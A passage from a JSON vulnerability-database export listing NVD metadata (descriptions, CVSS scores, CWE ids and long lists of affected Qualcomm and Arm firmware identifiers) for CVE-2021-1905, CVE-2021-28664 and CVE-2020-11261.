"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-07T09:15:00", "type": "prion", "title": "CVE-2021-1905", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1905"], "modified": "2021-05-12T16:02:00", "id": "PRION:CVE-2021-1905", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-1905", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:35:55", "description": "The Arm Mali GPU kernel driver allows privilege escalation or a denial of service (memory corruption) because an unprivileged user can achieve read/write access to read-only pages. This affects Bifrost r0p0 through r29p0 before r30p0, Valhall r19p0 through r29p0 before r30p0, and Midgard r8p0 through r30p0 before r31p0.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T15:15:00", "type": "cve", "title": "CVE-2021-28664", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28664"], "modified": "2022-10-27T21:15:00", "cpe": ["cpe:/a:arm:bifrost_gpu_kernel_driver:r28p0", "cpe:/a:arm:midguard_gpu_kernel_driver:r30p0", "cpe:/a:arm:valhall_gpu_kernel_driver:r28p0"], "id": "CVE-2021-28664", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28664", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:arm:bifrost_gpu_kernel_driver:r28p0:*:*:*:*:*:*:*", "cpe:2.3:a:arm:midguard_gpu_kernel_driver:r30p0:*:*:*:*:*:*:*", "cpe:2.3:a:arm:valhall_gpu_kernel_driver:r28p0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:13:00", "description": "Memory corruption due to improper check to return error when user application requests memory allocation of a huge size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-09T05:15:00", "type": "cve", "title": "CVE-2020-11261", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11261"], "modified": "2021-06-16T18:28:00", "cpe": ["cpe:/o:qualcomm:qpm5679_firmware:-", "cpe:/o:qualcomm:pm8150_firmware:-", "cpe:/o:qualcomm:qln1021aq_firmware:-", "cpe:/o:qualcomm:pm7250_firmware:-", "cpe:/o:qualcomm:qet4101_firmware:-", "cpe:/o:qualcomm:qca6431_firmware:-", "cpe:/o:qualcomm:qpm4640_firmware:-", "cpe:/o:qualcomm:qpm5579_firmware:-", "cpe:/o:qualcomm:sd855_firmware:-", "cpe:/o:qualcomm:sd660_firmware:-", "cpe:/o:qualcomm:sd720g_firmware:-", "cpe:/o:qualcomm:sd_8c_firmware:-", "cpe:/o:qualcomm:qtc800s_firmware:-", "cpe:/o:qualcomm:smb1354_firmware:-", "cpe:/o:qualcomm:sd_455_firmware:-", "cpe:/o:qualcomm:apq8009w_firmware:-", "cpe:/o:qualcomm:csra6640_firmware:-", "cpe:/o:qualcomm:wcn3988_firmware:-", "cpe:/o:qualcomm:wtr4905_firmware:-", "cpe:/o:qualcomm:qdm2301_firmware:-", "cpe:/o:qualcomm:qdm3302_firmware:-", "cpe:/o:qualcomm:wcn3620_firmware:-", "cpe:/o:qualcomm:qpm5541_firmware:-", "cpe:/o:qualcomm:sdr735_firmware:-", "cpe:/o:qualcomm:qpm5620_firmware:-", "cpe:/o:qualcomm:sdw3100_firmware:-", "cpe:/o:qualcomm:qpm5621_firmware:-", "cpe:/o:qualcomm:pmi632_firmware:-", "cpe:/o:qualcomm:qdm2302_firmware:-", "cpe:/o:qualcomm:sd670_firmware:-", "cpe:/o:qualcomm:qca6595au_firmware:-", "cpe:/o:qualcomm:qln1020_firmware:-", "cpe:/o:qualcomm:qtc801s_firmware:-", "cpe:/o:qualcomm:qca6421_firmware:-", "cpe:/o:qualcomm:sdx55_firmware:-", "cpe:/o:qualcomm:sa415m_firmware:-", "cpe:/o:qualcomm:smr525_firmware:-", "cpe:/o:qualcomm:msm8920_firmware:-", "cpe:/o:qualcomm:qpm5577_firmware:-", "cpe:/o:qualcomm:wcn3680b_firmware:-", "cpe:/o:qualcomm:apq8017_firmware:-", "cpe:/o:qualcomm:qfe4320_firmware:-", "cpe:/o:qualcomm:qca6564au_firmware:-", "cpe:/o:qualcomm:pm8937_firmware:-", "cpe:/o:qualcomm:qfe4303_firmware:-", "cpe:/o:qualcomm:pm6250_firmware:-", "cpe:/o:qualcomm:pmm8155au_firmware:-", "cpe:/o:qualcomm:wcn3615_firmware:-", "cpe:/o:qualcomm:pmx20_firmware:-", "cpe:/o:qualcomm:qcm4290_firmware:-", "cpe:/o:qualcomm:sd845_firmware:-", "cpe:/o:qualcomm:qpa8802_firmware:-", "cpe:/o:qualcomm:qtm525_firmware:-", "cpe:/o:qualcomm:pm7150l_firmware:-", "cpe:/o:qualcomm:qpm5677_firmware:-", "cpe:/o:qualcomm:rgr7640au_firmware:-", "cpe:/o:qualcomm:qpm4650_firmware:-", "cpe:/o:qualcomm:qbt1500_firmware:-", "cpe:/o:qualcomm:sm4350_firmware:-", "cpe:/o:qualcomm:pmm6155au_firmware:-", "cpe:/o:qualcomm:wcn6856_firmware:-", "cpe:/o:qualcomm:qpm6670_firmware:-", "cpe:/o:qualcomm:pm670a_firmware:-", "cpe:/o:qualcomm:msm8940_firmware:-", "cpe:/o:qualcomm:qpa8675_firmware:-", "cpe:/o:qualcomm:sdr8150_firmware:-", "cpe:/o:qualcomm:sm6250p_firmware:-", "cpe:/o:qualcomm:pmr735b_firmware:-", "cpe:/o:qualcomm:smb1355_firmware:-", "cpe:/o:qualcomm:qca6391_firmware:-", "cpe:/o:qualcomm:sd429_firmware:-", "cpe:/o:qualcomm:wcn3991_firmware:-", "cpe:/o:qualcomm:qca6430_firmware:-", "cpe:/o:qualcomm:qdm5620_firmware:-", "cpe:/o:qualcomm:apq8037_firmware:-", "cpe:/o:qualcomm:qpa8673_firmware:-", "cpe:/o:qualcomm:qca6335_firmware:-", "cpe:/o:qualcomm:pm8150b_firmware:-", "cpe:/o:qualcomm:pm8996_firmware:-", "cpe:/o:qualcomm:qdm5621_firmware:-", "cpe:/o:qualcomm:qpm6375_firmware:-", "cpe:/o:qualcomm:pm8940_firmware:-", "cpe:/o:qualcomm:sd821_firmware:-", "cpe:/o:qualcomm:sd835_firmware:-", "cpe:/o:qualcomm:sa515m_firmware:-", "cpe:/o:qualcomm:pm439_firmware:-", "cpe:/o:qualcomm:qpm8830_firmware:-", "cpe:/o:qualcomm:sdx24_firmware:-", "cpe:/o:qualcomm:qfe2550_firmware:-", "cpe:/o:qualcomm:smb1358_firmware:-", "cpe:/o:qualcomm:sdr865_firmware:-", "cpe:/o:qualcomm:smb1390_firmware:-", "cpe:/o:qualcomm:qpm5641_firmware:-", "cpe:/o:qualcomm:wsa8810_firmware:-", "cpe:/o:qualcomm:pm7250b_firmware:-", "cpe:/o:qualcomm:pmx55_firmware:-", "cpe:/o:qualcomm:sa8155_firmware:-", "cpe:/o:qualcomm:sdr735g_firmware:-", "cpe:/o:qualcomm:pm6150l_firmware:-", "cpe:/o:qualcomm:sd439_firmware:-", "cpe:/o:qualcomm:qcs6125_firmware:-", "cpe:/o:qualcomm:sd690_5g_firmware:-", "cpe:/o:qualcomm:qtc800h_firmware:-", "cpe:/o:qualcomm:qat3516_firmware:-", "cpe:/o:qualcomm:wtr2955_firmware:-", "cpe:/o:qualcomm:csrb31024_firmware:-", "cpe:/o:qualcomm:qpa8821_firmware:-", "cpe:/o:qualcomm:sd460_firmware:-", "cpe:/o:qualcomm:wcn3990_firmware:-", "cpe:/o:qualcomm:qtc410s_firmware:-", "cpe:/o:qualcomm:pmk8001_firmware:-", "cpe:/o:qualcomm:smb1351_firmware:-", "cpe:/o:qualcomm:qca6310_firmware:-", "cpe:/o:qualcomm:pmi8998_firmware:-", "cpe:/o:qualcomm:pmr735a_firmware:-", "cpe:/o:qualcomm:qln1030_firmware:-", "cpe:/o:qualcomm:msm8909w_firmware:-", "cpe:/o:qualcomm:pm8350bhs_firmware:-", "cpe:/o:qualcomm:qpa4340_firmware:-", "cpe:/o:qualcomm:aqt1000_firmware:-", "cpe:/o:qualcomm:qtm527_firmware:-", "cpe:/o:qualcomm:smb231_firmware:-", "cpe:/o:qualcomm:wcn6740_firmware:-", "cpe:/o:qualcomm:qdm5670_firmware:-", "cpe:/o:qualcomm:qpm6621_firmware:-", "cpe:/o:qualcomm:qln4640_firmware:-", "cpe:/o:qualcomm:wcd9340_firmware:-", "cpe:/o:qualcomm:pmx24_firmware:-", "cpe:/o:qualcomm:qpm6585_firmware:-", "cpe:/o:qualcomm:wcn6851_firmware:-", "cpe:/o:qualcomm:qpa2625_firmware:-", "cpe:/o:qualcomm:qpa5580_firmware:-", "cpe:/o:qualcomm:wtr3905_firmware:-", "cpe:/o:qualcomm:qln1031_firmware:-", "cpe:/o:qualcomm:wtr2965_firmware:-", "cpe:/o:qualcomm:qca6564a_firmware:-", "cpe:/o:qualcomm:sd_636_firmware:-", "cpe:/o:qualcomm:sd_8cx_firmware:-", "cpe:/o:qualcomm:pm670_firmware:-", "cpe:/o:qualcomm:qca6574a_firmware:-", "cpe:/o:qualcomm:sa6155_firmware:-", "cpe:/o:qualcomm:qat5522_firmware:-", "cpe:/o:qualcomm:qsw8574_firmware:-", "cpe:/o:qualcomm:qca6320_firmware:-", "cpe:/o:qualcomm:qpa5581_firmware:-", "cpe:/o:qualcomm:qpm5658_firmware:-", "cpe:/o:qualcomm:qca4020_firmware:-", "cpe:/o:qualcomm:qcs4290_firmware:-", "cpe:/o:qualcomm:smb2351_firmware:-", "cpe:/o:qualcomm:sd710_firmware:-", "cpe:/o:qualcomm:wcn3660b_firmware:-", "cpe:/o:qualcomm:sd_675_firmware:-", "cpe:/o:qualcomm:qcs605_firmware:-", "cpe:/o:qualcomm:pmw3100_firmware:-", "cpe:/o:qualcomm:sd765_firmware:-", "cpe:/o:qualcomm:apq8096au_firmware:-", "cpe:/o:qualcomm:csra6620_firmware:-", "cpe:/o:qualcomm:sd675_firmware:-", "cpe:/o:qualcomm:pm4125_firmware:-", "cpe:/o:qualcomm:pmk7350_firmware:-", "cpe:/o:qualcomm:sdr675_firmware:-", "cpe:/o:qualcomm:qat5568_firmware:-", "cpe:/o:qualcomm:smb1396_firmware:-", "cpe:/o:qualcomm:sdx50m_firmware:-", "cpe:/o:qualcomm:qca6574au_firmware:-", "cpe:/o:qualcomm:ar8151_firmware:-", "cpe:/o:qualcomm:msm8937_firmware:-", "cpe:/o:qualcomm:pm8250_firmware:-", "cpe:/o:qualcomm:sd662_firmware:-", "cpe:/o:qualcomm:wcn3660_firmware:-", "cpe:/o:qualcomm:qpm8870_firmware:-", "cpe:/o:qualcomm:qcs405_firmware:-", "cpe:/o:qualcomm:msm8917_firmware:-", "cpe:/o:qualcomm:qcs410_firmware:-", "cpe:/o:qualcomm:qet5100_firmware:-", "cpe:/o:qualcomm:pmc1000h_firmware:-", "cpe:/o:qualcomm:qat3522_firmware:-", "cpe:/o:qualcomm:qca6390_firmware:-", "cpe:/o:qualcomm:pm6150a_firmware:-", "cpe:/o:qualcomm:qpm6582_firmware:-", "cpe:/o:qualcomm:qpm4641_firmware:-", "cpe:/o:qualcomm:mdm9650_firmware:-", "cpe:/o:qualcomm:qdm5650_firmware:-", "cpe:/o:qualcomm:pm640p_firmware:-", "cpe:/o:qualcomm:pm456_firmware:-", "cpe:/o:qualcomm:pm3003a_firmware:-", "cpe:/o:qualcomm:qat3518_firmware:-", "cpe:/o:qualcomm:smb1357_firmware:-", "cpe:/o:qualcomm:pmd9655_firmware:-", "cpe:/o:qualcomm:qfs2530_firmware:-", "cpe:/o:qualcomm:qfs2608_firmware:-", "cpe:/o:qualcomm:sdx20_firmware:-", "cpe:/o:qualcomm:sdxr1_firmware:-", "cpe:/o:qualcomm:smb1360_firmware:-", "cpe:/o:qualcomm:pm855_firmware:-", "cpe:/o:qualcomm:wcd9341_firmware:-", "cpe:/o:qualcomm:wcn6750_firmware:-", "cpe:/o:qualcomm:sdr8250_firmware:-", "cpe:/o:qualcomm:sdw2500_firmware:-", "cpe:/o:qualcomm:qbt1000_firmware:-", "cpe:/o:qualcomm:pmr525_firmware:-", "cpe:/o:qualcomm:qat3550_firmware:-", "cpe:/o:qualcomm:qpa8686_firmware:-", "cpe:/o:qualcomm:qet6100_firmware:-", "cpe:/o:qualcomm:pm660_firmware:-", "cpe:/o:qualcomm:qfs2630_firmware:-", "cpe:/o:qualcomm:sdm429w_firmware:-", "cpe:/o:qualcomm:wtr6955_firmware:-", "cpe:/o:qualcomm:qtc800t_firmware:-", "cpe:/o:qualcomm:qpm8895_firmware:-", "cpe:/o:qualcomm:apq8009_firmware:-", "cpe:/o:qualcomm:pm7150a_firmware:-", "cpe:/o:qualcomm:qdm2308_firmware:-", "cpe:/o:qualcomm:qca6564_firmware:-", "cpe:/o:qualcomm:qat5516_firmware:-", "cpe:/o:qualcomm:smb1350_firmware:-", "cpe:/o:qualcomm:pm8909_firmware:-", "cpe:/o:qualcomm:wcd9335_firmware:-", "cpe:/o:qualcomm:qln4642_firmware:-", "cpe:/o:qualcomm:qdm3301_firmware:-", "cpe:/o:qualcomm:msm8996au_firmware:-", "cpe:/o:qualcomm:pm8350b_firmware:-", "cpe:/o:qualcomm:qpa8803_firmware:-", "cpe:/o:qualcomm:sd205_firmware:-", "cpe:/o:qualcomm:qsm7250_firmware:-", "cpe:/o:qualcomm:sm6250_firmware:-", "cpe:/o:qualcomm:qln1036aq_firmware:-", "cpe:/o:qualcomm:pm8998_firmware:-", "cpe:/o:qualcomm:wcn3980_firmware:-", "cpe:/o:qualcomm:wcn6850_firmware:-", "cpe:/o:qualcomm:qat3519_firmware:-", "cpe:/o:qualcomm:sm7250p_firmware:-", "cpe:/o:qualcomm:pm8004_firmware:-", "cpe:/o:qualcomm:qln4650_firmware:-", "cpe:/o:qualcomm:smb1398_firmware:-", "cpe:/o:qualcomm:qfe4301_firmware:-", "cpe:/o:qualcomm:pm8150a_firmware:-", "cpe:/o:qualcomm:qpm5657_firmware:-", "cpe:/o:qualcomm:apq8053_firmware:-", "cpe:/o:qualcomm:pmm855au_firmware:-", "cpe:/o:qualcomm:sd665_firmware:-", "cpe:/o:qualcomm:qbt2000_firmware:-", "cpe:/o:qualcomm:apq8064au_firmware:-", "cpe:/o:qualcomm:pmm8996au_firmware:-", "cpe:/o:qualcomm:qpm5875_firmware:-", "cpe:/o:qualcomm:wsa8815_firmware:-", "cpe:/o:qualcomm:wgr7640_firmware:-", "cpe:/o:qualcomm:wcn3950_firmware:-", "cpe:/o:qualcomm:sdm630_firmware:-", "cpe:/o:qualcomm:pmk8003_firmware:-", "cpe:/o:qualcomm:sd765g_firmware:-", "cpe:/o:qualcomm:pm8005_firmware:-", "cpe:/o:qualcomm:sd768g_firmware:-", "cpe:/o:qualcomm:qcs603_firmware:-", "cpe:/o:qualcomm:pm8350bh_firmware:-", "cpe:/o:qualcomm:pme605_firmware:-", "cpe:/o:qualcomm:sd820_firmware:-", "cpe:/o:qualcomm:pm640a_firmware:-", "cpe:/o:qualcomm:qfe3340_firmware:-", "cpe:/o:qualcomm:qet4100_firmware:-", "cpe:/o:qualcomm:qet6110_firmware:-", "cpe:/o:qualcomm:qsm8250_firmware:-", "cpe:/o:qualcomm:sm7350_firmware:-", "cpe:/o:qualcomm:qca6584au_firmware:-", "cpe:/o:qualcomm:qcs2290_firmware:-", "cpe:/o:qualcomm:smb1395_firmware:-", "cpe:/o:qualcomm:sd210_firmware:-", "cpe:/o:qualcomm:qpa5373_firmware:-", "cpe:/o:qualcomm:qpm5670_firmware:-", "cpe:/o:qualcomm:qpm2630_firmware:-", "cpe:/o:qualcomm:qpm8820_firmware:-", "cpe:/o:qualcomm:sdx20m_firmware:-", "cpe:/o:qualcomm:pm6350_firmware:-", "cpe:/o:qualcomm:qdm2305_firmware:-", "cpe:/o:qualcomm:qdm2310_firmware:-", "cpe:/o:qualcomm:sd865_5g_firmware:-", "cpe:/o:qualcomm:qpa5461_firmware:-", "cpe:/o:qualcomm:pm8916_firmware:-", "cpe:/o:qualcomm:pm8150l_firmware:-", "cpe:/o:qualcomm:sdxr2_5g_firmware:-", "cpe:/o:qualcomm:pm855a_firmware:-", "cpe:/o:qualcomm:fsm10056_firmware:-", "cpe:/o:qualcomm:rsw8577_firmware:-", "cpe:/o:qualcomm:wtr5975_firmware:-", "cpe:/o:qualcomm:qca8337_firmware:-", "cpe:/o:qualcomm:qdm4643_firmware:-", "cpe:/o:qualcomm:pm670l_firmware:-", "cpe:/o:qualcomm:qfe2101_firmware:-", "cpe:/o:qualcomm:sa6155p_firmware:-", "cpe:/o:qualcomm:pm855b_firmware:-", "cpe:/o:qualcomm:qca6420_firmware:-", "cpe:/o:qualcomm:qcc1110_firmware:-", "cpe:/o:qualcomm:sdr660_firmware:-", "cpe:/o:qualcomm:smb1380_firmware:-", "cpe:/o:qualcomm:qpa4360_firmware:-", "cpe:/o:qualcomm:pm215_firmware:-", "cpe:/o:qualcomm:wcd9371_firmware:-", "cpe:/o:qualcomm:sdr845_firmware:-", "cpe:/o:qualcomm:pm8150c_firmware:-", "cpe:/o:qualcomm:wsa8830_firmware:-", "cpe:/o:qualcomm:sd888_5g_firmware:-", "cpe:/o:qualcomm:qdm2307_firmware:-", "cpe:/o:qualcomm:qca9379_firmware:-", "cpe:/o:qualcomm:pmk8002_firmware:-", "cpe:/o:qualcomm:pm8350_firmware:-", "cpe:/o:qualcomm:wcn3998_firmware:-", "cpe:/o:qualcomm:pm6125_firmware:-", "cpe:/o:qualcomm:ar8031_firmware:-", "cpe:/o:qualcomm:qualcomm215_firmware:-", "cpe:/o:qualcomm:sdm830_firmware:-", "cpe:/o:qualcomm:ar8035_firmware:-", "cpe:/o:qualcomm:qat5533_firmware:-", "cpe:/o:qualcomm:wtr3925_firmware:-", "cpe:/o:qualcomm:pmi8952_firmware:-", "cpe:/o:qualcomm:qat3555_firmware:-", "cpe:/o:qualcomm:pm855p_firmware:-", "cpe:/o:qualcomm:qpm6325_firmware:-", "cpe:/o:qualcomm:wtr3950_firmware:-", "cpe:/o:qualcomm:wcn3610_firmware:-", "cpe:/o:qualcomm:smr526_firmware:-", "cpe:/o:qualcomm:qfe4309_firmware:-", "cpe:/o:qualcomm:sa6145p_firmware:-", "cpe:/o:qualcomm:smb1381_firmware:-", "cpe:/o:qualcomm:qpa4361_firmware:-", "cpe:/o:qualcomm:qca6426_firmware:-", "cpe:/o:qualcomm:wcn3910_firmware:-", "cpe:/o:qualcomm:qpa8801_firmware:-", "cpe:/o:qualcomm:qsw8573_firmware:-", "cpe:/o:qualcomm:wcd9385_firmware:-", "cpe:/o:qualcomm:qfe4373fc_firmware:-", "cpe:/o:qualcomm:sm4125_firmware:-", "cpe:/o:qualcomm:qdm5579_firmware:-", "cpe:/o:qualcomm:qcm2290_firmware:-", "cpe:/o:qualcomm:qdm4650_firmware:-", "cpe:/o:qualcomm:sdr052_firmware:-", "cpe:/o:qualcomm:qpm4630_firmware:-", "cpe:/o:qualcomm:qsw6310_firmware:-", "cpe:/o:qualcomm:sda429w_firmware:-", "cpe:/o:qualcomm:smb1394_firmware:-", "cpe:/o:qualcomm:pm8350c_firmware:-", "cpe:/o:qualcomm:pmi8996_firmware:-", "cpe:/o:qualcomm:sd632_firmware:-", "cpe:/o:qualcomm:qpa6560_firmware:-", "cpe:/o:qualcomm:msm8953_firmware:-", "cpe:/o:qualcomm:qat5515_firmware:-", "cpe:/o:qualcomm:qcm6125_firmware:-", "cpe:/o:qualcomm:pmx50_firmware:-", "cpe:/o:qualcomm:wcd9326_firmware:-", "cpe:/o:qualcomm:wcd9380_firmware:-", "cpe:/o:qualcomm:pm660l_firmware:-", "cpe:/o:qualcomm:qfe4305_firmware:-", "cpe:/o:qualcomm:qln5030_firmware:-", "cpe:/o:qualcomm:qet5100m_firmware:-", "cpe:/o:qualcomm:qdm5677_firmware:-", "cpe:/o:qualcomm:sdr660g_firmware:-", "cpe:/o:qualcomm:wsa8835_firmware:-", "cpe:/o:qualcomm:sa8155p_firmware:-", "cpe:/o:qualcomm:sd750g_firmware:-", "cpe:/o:qualcomm:qfe4308_firmware:-", "cpe:/o:qualcomm:qfs2580_firmware:-", "cpe:/o:qualcomm:sdr425_firmware:-", "cpe:/o:qualcomm:sdx55m_firmware:-", "cpe:/o:qualcomm:qdm5652_firmware:-", "cpe:/o:qualcomm:wcn3999_firmware:-", "cpe:/o:qualcomm:wcd9370_firmware:-", "cpe:/o:qualcomm:pm8009_firmware:-", "cpe:/o:qualcomm:qfe4302_firmware:-", "cpe:/o:qualcomm:pm640l_firmware:-", "cpe:/o:qualcomm:qdm5679_firmware:-", "cpe:/o:qualcomm:qca6174a_firmware:-", "cpe:/o:qualcomm:sd450_firmware:-", "cpe:/o:qualcomm:fsm10055_firmware:-", "cpe:/o:qualcomm:pm6150_firmware:-", "cpe:/o:qualcomm:pmi8937_firmware:-", "cpe:/o:qualcomm:qca6696_firmware:-", "cpe:/o:qualcomm:sd730_firmware:-", "cpe:/o:qualcomm:pmi8994_firmware:-", "cpe:/o:qualcomm:qca6574_firmware:-", "cpe:/o:qualcomm:pm855l_firmware:-", "cpe:/o:qualcomm:pm8008_firmware:-", "cpe:/o:qualcomm:wcn3680_firmware:-", "cpe:/o:qualcomm:qdm5671_firmware:-", "cpe:/o:qualcomm:qat3514_firmware:-", "cpe:/o:qualcomm:pmk8350_firmware:-", "cpe:/o:qualcomm:qca6436_firmware:-", "cpe:/o:qualcomm:pm8953_firmware:-", "cpe:/o:qualcomm:qpm4621_firmware:-", "cpe:/o:qualcomm:sdr051_firmware:-", "cpe:/o:qualcomm:pm7350c_firmware:-", "cpe:/o:qualcomm:wcd9375_firmware:-", "cpe:/o:qualcomm:qcs610_firmware:-", "cpe:/o:qualcomm:qca9377_firmware:-", "cpe:/o:qualcomm:qln5040_firmware:-", "cpe:/o:qualcomm:qpa8842_firmware:-", "cpe:/o:qualcomm:qpa5460_firmware:-", "cpe:/o:qualcomm:pm660a_firmware:-", "cpe:/o:qualcomm:qln5020_firmware:-", "cpe:/o:qualcomm:qfe2520_firmware:-", "cpe:/o:qualcomm:qpm5870_firmware:-"], "id": "CVE-2020-11261", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11261", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:qualcomm:pm8937_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs4290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8870_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa8155p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe3340_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln4642_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8009w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc800h_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8673_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:fsm10056_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6740_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd821_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4641_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8017_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8810_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd675_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5671_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6335_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd835_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3680_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5541_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx55m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx55_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsw8573_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1354_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3910_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1360_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6585_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5579_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr425_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3988_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr6955_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd205_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9340_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8830_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8842_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd690_5g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca4020_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5652_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2580_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd460_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm660a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1357_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm3003a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5373_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9385_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5522_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa2625_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:rgr7640au_firmware:-:*:*:*:*:*:*:*", 